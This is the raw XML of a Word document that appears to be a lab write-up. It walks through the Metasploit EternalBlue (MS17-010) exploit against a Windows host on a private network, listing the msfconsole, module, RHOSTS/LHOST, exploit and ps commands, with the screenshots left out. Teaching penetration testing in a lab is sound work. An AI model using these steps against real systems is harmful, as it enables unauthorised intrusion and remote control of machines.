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39B92" w14:textId="269A82A6" w:rsidR="00945E07" w:rsidRPr="0035798C" w:rsidRDefault="0035798C" w:rsidP="0035798C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035798C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3223FB58" w14:textId="21E2018E" w:rsidR="00945E07" w:rsidRDefault="00945E07" w:rsidP="00E47568">
      <w:r>
        <w:t>Start Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidR="00E47568">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296E2780" w14:textId="11A468B9" w:rsidR="00945E07" w:rsidRPr="00E47568" w:rsidRDefault="00E47568" w:rsidP="00945E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945E07" w:rsidRPr="00E47568">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225EDB01" w14:textId="36E20B60" w:rsidR="00945E07" w:rsidRDefault="00945E07" w:rsidP="00945E07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56C57AF3" wp14:editId="62E57DC9">
            <wp:extent cx="5731510" cy="4020185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="146731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2CC0" w14:textId="77777777" w:rsidR="00945E07" w:rsidRDefault="00945E07" w:rsidP="00945E07"/>
    <w:p w14:paraId="3B208C22" w14:textId="1092D175" w:rsidR="00945E07" w:rsidRDefault="00945E07" w:rsidP="00E47568">
      <w:r>
        <w:t>Check if the target is vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="0035798C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE275F2" w14:textId="7C7C3B62" w:rsidR="00945E07" w:rsidRPr="00E47568" w:rsidRDefault="00E47568" w:rsidP="00945E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&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00945E07" w:rsidRPr="00E47568">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A69B976" w14:textId="7D5A82F4" w:rsidR="00945E07" w:rsidRPr="00E47568" w:rsidRDefault="00E47568" w:rsidP="00945E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&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00945E07" w:rsidRPr="00E47568">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>set RHOSTS 10.0.2.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27949800" w14:textId="1579A68F" w:rsidR="00945E07" w:rsidRDefault="00945E07" w:rsidP="00945E07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54F95D18" wp14:editId="5F637240">
            <wp:extent cx="5731510" cy="753110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="56574785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47859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5D36" w14:textId="77777777" w:rsidR="00945E07" w:rsidRDefault="00945E07" w:rsidP="00945E07"/>
    <w:p w14:paraId="72B84393" w14:textId="77777777" w:rsidR="00E47568" w:rsidRDefault="00E47568" w:rsidP="00945E07"/>
    <w:p w14:paraId="41D79FD2" w14:textId="77777777" w:rsidR="00E47568" w:rsidRDefault="00E47568" w:rsidP="00945E07"/>
    <w:p w14:paraId="0F0CA6EF" w14:textId="77777777" w:rsidR="00E47568" w:rsidRDefault="00E47568" w:rsidP="00945E07"/>
    <w:p w14:paraId="336A6783" w14:textId="77777777" w:rsidR="00E47568" w:rsidRDefault="00E47568" w:rsidP="00945E07"/>
    <w:p w14:paraId="693A33BC" w14:textId="73D4AB99" w:rsidR="00945E07" w:rsidRPr="00E47568" w:rsidRDefault="00E47568" w:rsidP="00945E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&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00945E07" w:rsidRPr="00E47568">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>set LHOST 10.0.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C106192" w14:textId="53E4D29B" w:rsidR="00945E07" w:rsidRDefault="00945E07" w:rsidP="00945E07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FC97EDB" wp14:editId="3BBD54E5">
            <wp:extent cx="5731510" cy="1835785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1872992573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92573" name="Picture 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B572" w14:textId="2943D12A" w:rsidR="00945E07" w:rsidRPr="00E47568" w:rsidRDefault="00E47568" w:rsidP="00945E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&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00945E07" w:rsidRPr="00E47568">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A3E68F" w14:textId="5A45977F" w:rsidR="00945E07" w:rsidRDefault="00945E07" w:rsidP="00945E07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D154F48" wp14:editId="156CED39">
            <wp:extent cx="5731510" cy="2503170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="837148331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8331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C154" w14:textId="700D2EE7" w:rsidR="00714A44" w:rsidRDefault="00714A44" w:rsidP="00945E07">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37A772E7" wp14:editId="428EAC01">
            <wp:extent cx="5731510" cy="388620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="163390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C3CF" w14:textId="77777777" w:rsidR="00945E07" w:rsidRDefault="00945E07" w:rsidP="00945E07"/>
    <w:p w14:paraId="04A4BD89" w14:textId="6B7A1CFD" w:rsidR="00945E07" w:rsidRDefault="00945E07" w:rsidP="00E47568">
      <w:r>
        <w:t>Retrieve running processes from the target</w:t>
      </w:r>
      <w:r w:rsidR="0035798C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64434AAE" w14:textId="7AFCA8F3" w:rsidR="00583448" w:rsidRPr="00E47568" w:rsidRDefault="00E47568" w:rsidP="00945E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&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00945E07" w:rsidRPr="00E47568">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7B1559" w14:textId="3D138B20" w:rsidR="00945E07" w:rsidRDefault="00945E07" w:rsidP="00945E07">
      <w:r w:rsidRPr="00945E07">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31CD1495" wp14:editId="239B5652">
            <wp:extent cx="2219635" cy="419158"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="192872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24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B593" w14:textId="77777777" w:rsidR="00945E07" w:rsidRDefault="00945E07" w:rsidP="00945E07"/>
    <w:sectPr w:rsidR="0094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1274"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B784D1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0166"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="09401F8E"/>
    <w:lvl w:ilvl="0" w:tplc="671E5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A03E5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="488476A2"/>
    <w:lvl w:ilvl="0" w:tplc="671E5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925765">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1263535518">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="226963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48"/>
    <w:rsid w:val="0007202E"/>
    <w:rsid w:val="0035798C"/>
    <w:rsid w:val="003F71F6"/>
    <w:rsid w:val="00583448"/>
    <w:rsid w:val="00714A44"/>
    <w:rsid w:val="00945E07"/>
    <w:rsid w:val="00E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39CB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{263C86DB-A57D-45EF-BC6C-E35E004C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E07"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00583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Ammad</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Manal Ammad</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-30T14:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-30T14:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>